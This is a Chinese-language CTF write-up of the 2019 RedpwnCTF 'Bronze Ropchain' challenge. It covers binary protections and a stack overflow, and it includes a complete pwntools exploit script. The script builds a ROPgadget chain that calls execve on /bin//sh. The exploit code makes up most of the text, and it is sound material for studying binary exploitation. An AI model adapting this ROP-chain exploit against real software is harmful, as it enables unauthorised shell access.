2019 RedpwnCTF Bronze Ropchain

这个题应该简单记录一下，感谢今天梦师傅的指点嘻嘻orz
因为它有点不一样

checksec

kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ checksec ./bronze_ropchain 
[*] '/home/kk/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain/bronze_ropchain'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

file/ldd

kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ file ./bronze_ropchain 
./bronze_ropchain: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=16a9964f0e243870ebccdaf50522bcee80741083, not stripped

kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ldd ./bronze_ropchain 
    not a dynamic executable

这两个指令都可以看出是静态编译
ida
漏洞很好找啦，栈溢出

OS: 本来我看见canary开启了，我就想先leak canary，结果...不需要，因为静态编译，观察ida没有readsword（梦师傅教我的哈哈哈哈），所以并不存在canary
运行一下看看

kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ./bronze_ropchain 
What is your name?
kkkkk
Hello kkkkk
! How are you on this fine day?

输入不到0x400，可以发现函数支持\x0a截断
所以我们用ROPgadget找ropchain

ROPgadget --binary ./bronze_ropchain --badbytes '00|0a' --ropchain

参数badtypes指不含\x00 \x0a的ropchain

exp👇

#!usr/bin/python
from pwn import *
from struct import pack
# io = remote('chall2.2019.redpwn.net', 4004)
io = process('./bronze_ropchain')

io.recv()
p = ''
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80
payload = "a" * 0x18 + "a" * 4 + p

io.sendline(payload)
io.sendline('')

io.interactive()